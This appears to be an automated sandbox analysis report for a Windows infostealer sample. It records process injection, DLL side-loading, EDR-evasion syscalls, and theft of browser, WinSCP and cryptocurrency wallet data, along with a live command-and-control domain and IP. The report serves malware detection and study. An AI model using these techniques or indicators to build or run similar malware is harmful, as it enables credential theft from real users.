                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeNtQuerySystemInformation: Direct from: 0x23B00000000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeNtCreateFile: Direct from: 0x2B7CD452D58Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtCreateFile: Direct from: 0x14011D7A4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtReadVirtualMemory: Direct from: 0x7FF7880C00F3Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtAllocateVirtualMemory: Direct from: 0x7FF787E73F92Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtAllocateVirtualMemory: Direct from: 0x7FF787F8B53CJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeNtProtectVirtualMemory: Direct from: 0x6C006CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtCreateFile: Direct from: 0x7FF678142CFCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtAllocateVirtualMemory: Direct from: 0x140120A3CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtCreateFile: Direct from: 0x7FF67800C708Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtQueryInformationToken: Direct from: 0x7FF787F88C4AJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe protection: read writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe protection: read writeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe base: 14011BC08Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe base: 398010Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe base: 14011BC08Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe base: 313010Jump to behavior
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeProcess created: C:\Users\user\ActiveISO.exe "C:\Users\user\ActiveISO.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe C:\Users\user~1\AppData\Local\Temp\UploadAlt_Ti.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe C:\Users\user~1\AppData\Local\Temp\UploadAlt_Ti.exeJump to behavior
                  Source: ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: )[%d] Shell_TrayWndTrayNotifyWnd
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeCode function: 6_2_0040D72E cpuid 6_2_0040D72E
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeCode function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,6_2_00401F9D
                  Source: C:\Users\user\ActiveISO.exeCode function: ___lc_locale_name_func,GetLocaleInfoEx,8_2_00007FFB0BC9F610
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeCode function: 6_2_00401626 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,6_2_00401626
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF653738C60 StarBurn_Destroy,StarBurn_UDF2_VolumeDestroy,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,??0QString@@QEAA@XZ,??0QString@@QEAA@XZ,StarBurn_UDF2_DirectoryRootCreate,??4QString@@QEAAAEAV0@PEBD@Z,?isChecked@QGroupBox@@QEBA_NXZ,?text@QLineEdit@@QEBA?AVQString@@XZ,??1QString@@QEAA@XZ,??0QString@@QEAA@XZ,??0QString@@QEAA@XZ,?text@QLineEdit@@QEBA?AVQString@@XZ,??0QByteArray@@QEAA@AEBV0@@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?lastIndexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,?remove@QString@@QEAAAEAV1@HH@Z,??1QString@@QEAA@XZ,?toLocal8Bit@QString@@QEHAA?AVQByteArray@@XZ,??4QByteArray@@QEAAAEAV0@$$QEAV0@@Z,??1QByteArray@@QEAA@XZ,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,?toLocal8Bit@QString@@QEHAA?AVQByteArray@@XZ,??4QByteArray@@QEAAAEAV0@$$QEAV0@@Z,??1QByteArray@@QEAA@XZ,?data@QByteArray@@QEAAPEADXZ,?data@QByteArray@@QEAAPEADXZ,StarBurn_UDF2_FileBootCreate,??4QString@@QEAAAEAV0@PEBD@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??1QByteArray@@QEAA@XZ,??1QByteArray@@QEAA@XZ,?childCount@QTreeWidgetItem@@QEBAHXZ,?child@QTreeWidgetItem@@QEBAPEAV1@H@Z,?text@QTreeWidgetItem@@QEBA?AVQString@@H@Z,?child@QTreeWidgetItem@@QEBAPEAV1@H@Z,?text@QTreeWidgetItem@@QEBA?AVQString@@H@Z,??0QByteArray@@QEAA@AEBV0@@Z,?fromUtf8@QString@@SA?AV1@PEBDH@Z,?append@QString@@QEAAAEAV1@AEBV1@@Z,??1QString@@QEAA@XZ,??0QByteArray@@QEAA@AEBV0@@Z,?append@QString@@QEAAAEAV1@AEBV1@@Z,??4QString@@QEAAAEAV0@AEBV0@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,?child@QTreeWidgetItem@@QEBAPEAV1@H@Z,?text@QTreeWidgetItem@@QEBA?AVQString@@H@Z,??4QByteArray@@QEAAAEAV0@$$QEAV0@@Z,??1QString@@QEAA@XZ,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,?child@QTreeWidgetItem@@QEBAPEAV1@H@Z,?text@QTreeWidgetItem@@QEBA?AVQString@@H@Z,?toLong@QString@@QEBAJPEA_NH@Z,??1QString@@QEAA@XZ,?utf16@QString@@QEBAPEBGXZ,StarBurn_UDF2_Director8_2_00007FF653738C60
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeCode function: 6_2_00404FAA GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,memset,ShellExecuteExW,WaitForSingleObject,CloseHandle,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,6_2_00404FAA
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeKey opened: HKEY_CURRENT_USER\Software\monero-project\monero-coreJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2 OverrideJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\y572q81e.defaultJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ProfilesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-releaseJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Native API
                  11
                  DLL Side-Loading
                  1
                  Abuse Elevation Control Mechanism
                  1
                  Deobfuscate/Decode Files or Information
                  1
                  OS Credential Dumping
                  2
                  System Time Discovery
                  Remote Services11
                  Archive Collected Data
                  21
                  Encrypted Channel
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts2
                  Command and Scripting Interpreter
                  Boot or Logon Initialization Scripts11
                  DLL Side-Loading
                  1
                  Abuse Elevation Control Mechanism
                  1
                  Credentials in Registry
                  13
                  File and Directory Discovery
                  Remote Desktop Protocol11
                  Data from Local System
                  2
                  Non-Application Layer Protocol
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                  Access Token Manipulation
                  2
                  Obfuscated Files or Information
                  Security Account Manager146
                  System Information Discovery
                  SMB/Windows Admin SharesData from Network Shared Drive13
                  Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook212
                  Process Injection
                  1
                  Timestomp
                  NTDS121
                  Security Software Discovery
                  Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                  DLL Side-Loading
                  LSA Secrets1
                  Virtualization/Sandbox Evasion
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts121
                  Masquerading
                  Cached Domain Credentials2
                  Process Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Virtualization/Sandbox Evasion
                  DCSync1
                  System Network Configuration Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Access Token Manipulation
                  Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                  Process Injection
                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1556011 Sample: TVr2Z822J3.exe Startdate: 14/11/2024 Architecture: WINDOWS Score: 100 67 sirnisirlo.online 2->67 71 Suricata IDS alerts for network traffic 2->71 73 Malicious sample detected (through community Yara rule) 2->73 75 Yara detected UAC Bypass using CMSTP 2->75 77 2 other signatures 2->77 10 TVr2Z822J3.exe 14 2->10         started        14 ActiveISO.exe 1 2->14         started        16 ActiveISO.exe 1 2->16         started        signatures3 process4 file5 59 C:\Users\user\Qt5Widgets.dll, PE32+ 10->59 dropped 61 C:\Users\user\Qt5PrintSupport.dll, PE32+ 10->61 dropped 63 C:\Users\user\Qt5Network.dll, PE32+ 10->63 dropped 65 7 other files (3 malicious) 10->65 dropped 105 Drops PE files to the user root directory 10->105 18 ActiveISO.exe 13 10->18         started        107 Maps a DLL or memory area into another process 14->107 109 Found direct / indirect Syscall (likely to bypass EDR) 14->109 22 cmd.exe 2 14->22         started        24 cmd.exe 1 16->24         started        signatures6 process7 file8 45 C:\Users\user\AppData\...\Qt5Widgets.dll, PE32+ 18->45 dropped 47 C:\Users\user\AppData\...\Qt5PrintSupport.dll, PE32+ 18->47 dropped 49 C:\Users\user\AppData\...\Qt5Network.dll, PE32+ 18->49 dropped 53 7 other files (3 malicious) 18->53 dropped 79 Found direct / indirect Syscall (likely to bypass EDR) 18->79 26 ActiveISO.exe 1 18->26         started        51 C:\Users\user\AppData\Local\Temp\itpyyyx, PE32+ 22->51 dropped 81 Writes to foreign memory regions 22->81 83 Maps a DLL or memory area into another process 22->83 29 UploadAlt_Ti.exe 22->29         started        31 conhost.exe 22->31         started        33 conhost.exe 24->33         started        signatures9 process10 signatures11 101 Maps a DLL or memory area into another process 26->101 103 Found direct / indirect Syscall (likely to bypass EDR) 26->103 35 cmd.exe 5 26->35         started        process12 file13 55 C:\Users\user\AppData\Local\Temp\josveh, PE32+ 35->55 dropped 57 C:\Users\user\AppData\...\UploadAlt_Ti.exe, PE32+ 35->57 dropped 85 Writes to foreign memory regions 35->85 87 Found hidden mapped module (file has been removed from disk) 35->87 89 Maps a DLL or memory area into another process 35->89 91 Switches to a custom stack to bypass stack traces 35->91 39 UploadAlt_Ti.exe 35->39         started        43 conhost.exe 35->43         started        signatures14 process15 dnsIp16 69 sirnisirlo.online 188.114.97.3, 443, 49180, 49191 CLOUDFLARENETUS European Union 39->69 93 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 39->93 95 Tries to harvest and steal browser information (history, passwords, etc) 39->95 97 Tries to harvest and steal Bitcoin Wallet information 39->97 99 Found direct / indirect Syscall (likely to bypass EDR) 39->99 signatures17

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  TVr2Z822J3.exe5%ReversingLabs
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\josveh100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\itpyyyx100%Joe Sandbox ML
                  C:\Users\user\ActiveISO.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe0%ReversingLabs
                  C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe0%ReversingLabs
                  C:\Users\user\AppData\Roaming\UploadHost_UW\Qt5Core.dll0%ReversingLabs
                  C:\Users\user\AppData\Roaming\UploadHost_UW\Qt5Gui.dll0%ReversingLabs
                  C:\Users\user\AppData\Roaming\UploadHost_UW\Qt5Network.dll0%ReversingLabs
                  C:\Users\user\AppData\Roaming\UploadHost_UW\Qt5PrintSupport.dll0%ReversingLabs
                  C:\Users\user\AppData\Roaming\UploadHost_UW\Qt5Widgets.dll0%ReversingLabs
                  C:\Users\user\AppData\Roaming\UploadHost_UW\StarBurn.dll0%ReversingLabs
                  C:\Users\user\AppData\Roaming\UploadHost_UW\msvcp140.dll0%ReversingLabs
                  C:\Users\user\AppData\Roaming\UploadHost_UW\vcruntime140.dll0%ReversingLabs
                  C:\Users\user\AppData\Roaming\UploadHost_UW\vcruntime140_1.dll0%ReversingLabs
                  C:\Users\user\Qt5Core.dll0%ReversingLabs
                  C:\Users\user\Qt5Gui.dll0%ReversingLabs
                  C:\Users\user\Qt5Network.dll0%ReversingLabs
                  C:\Users\user\Qt5PrintSupport.dll0%ReversingLabs
                  C:\Users\user\Qt5Widgets.dll0%ReversingLabs
                  C:\Users\user\StarBurn.dll0%ReversingLabs
                  C:\Users\user\msvcp140.dll0%ReversingLabs
                  C:\Users\user\vcruntime140.dll0%ReversingLabs
                  C:\Users\user\vcruntime140_1.dll0%ReversingLabs
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  https://sirnisirlo.online/book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D0%Avira URL Cloudsafe
                  https://sirnisirlo.online:443/book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWA0%Avira URL Cloudsafe
                  http://www.lsoft.net/act/update.aspx?pid=%1&ver=%2&os=%31GotLatestVersion(QString)2LatestVersion(QSt0%Avira URL Cloudsafe
                  http://lsoft.net/act/activate.aspx?ID=%11slotReadyRead()2readyRead()1slotError(QNetworkReply::Networ0%Avira URL Cloudsafe
                  http://www.lsoft.net0%Avira URL Cloudsafe
                  https://sirnisirlo.online:4430%Avira URL Cloudsafe
                  https://www.lsoft.net/act/1DeRegister()2released()Deactivation0%Avira URL Cloudsafe
                  http://www.lsoft.net/act/update.aspx?pid=%1&ver=%2&os=%30%Avira URL Cloudsafe
                  http://lsoft.net/act/register.aspx?PID=%1&Email=%2&User=%31slotReadyRead()2readyRead()1slotError(QNe0%Avira URL Cloudsafe
                  http://lsoft.net/act/activate.aspx?ID=%1Error1slotReadyRead()Error2readyRead()1slotError(QNetworkRep0%Avira URL Cloudsafe
                  http://www.lsoft.net/act/update.aspx?pid=%1&ver=%2&os=%31DownloadInfo(QString)2DownloadInfo(QString)0%Avira URL Cloudsafe
                  https://sirnisirlo.online/book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4z0%Avira URL Cloudsafe
                  http://www.lsoft.net/act/update.aspx?pid=%1&ver=%2&os=%31LatestVersion(QString)2LatestVersion(QStrin0%Avira URL Cloudsafe
                  http://lsoft.net/act/register.aspx?PID=%1&Email=%2&User=%30%Avira URL Cloudsafe
                  https://www.lsoft.net/act/We0%Avira URL Cloudsafe
                  http://lsoft.net/act/activate.aspx?ID=%10%Avira URL Cloudsafe
                  https://www.lsoft.net/act/0%Avira URL Cloudsafe
                  http://www.ntfs.com/iso_file_manager.htm0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  sirnisirlo.online
                  188.114.97.3
                  truetrue
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    https://sirnisirlo.online/book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3Dtrue
                    • Avira URL Cloud: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.phreedom.org/md5)08:27TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1360603475.00007FFB0BDDA000.00000002.00000001.01000000.00000009.sdmp, ActiveISO.exe, 0000000A.00000002.1429231054.00007FFB09D5A000.00000002.00000001.01000000.00000015.sdmpfalse
                      high
                      http://www.vmware.com/0ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpfalse
                        high
                        http://www.softwareok.com/?Freeware/Find.Same.Images.OK/Historycmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000000.1612798615.00000001401F4000.00000002.00000001.01000000.0000001D.sdmpfalse
                          high
                          http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0ActiveISO.exe, 00000008.00000003.1327357565.000001AD5F9BA000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://ocsp.sectigo.com0ActiveISO.exe, 00000008.00000003.1327357565.000001AD5F9BA000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://www.softwareok.com/?Freeware/Find.Same.Images.OKcmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000000.1612798615.00000001401F4000.00000002.00000001.01000000.0000001D.sdmpfalse
                                high
                                http://lsoft.net/act/register.aspx?PID=%1&Email=%2&User=%31slotReadyRead()2readyRead()1slotError(QNeActiveISO.exe, 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmp, ActiveISO.exe, 0000000A.00000000.1335251768.00007FF6B203B000.00000002.00000001.01000000.00000010.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#ActiveISO.exe, 00000008.00000003.1327357565.000001AD5F9BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://www.lsoft.netActiveISO.exe, 0000000A.00000002.1428048059.00007FF6B2023000.00000002.00000001.01000000.00000010.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.lsoft.net/act/1DeRegister()2released()DeactivationActiveISO.exe, 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmp, ActiveISO.exe, 0000000A.00000000.1335251768.00007FF6B203B000.00000002.00000001.01000000.00000010.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.lsoft.net/act/update.aspx?pid=%1&ver=%2&os=%31GotLatestVersion(QString)2LatestVersion(QStActiveISO.exe, 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmp, ActiveISO.exe, 0000000A.00000000.1335251768.00007FF6B203B000.00000002.00000001.01000000.00000010.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://bugreports.qt.io/ActiveISO.exe, ActiveISO.exe, 0000000A.00000002.1429231054.00007FFB09D5A000.00000002.00000001.01000000.00000015.sdmpfalse
                                    high
                                    https://sirnisirlo.online:443UploadAlt_Ti.exe, 0000000F.00000002.1959820013.0000000000546000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.softwareok.de/?Freeware/Find.Same.Images.OKcmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000000.1612798615.00000001401F4000.00000002.00000001.01000000.0000001D.sdmpfalse
                                      high
                                      http://www.lsoft.net/act/update.aspx?pid=%1&ver=%2&os=%3ActiveISO.exe, ActiveISO.exe, 0000000A.00000000.1335251768.00007FF6B203B000.00000002.00000001.01000000.00000010.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
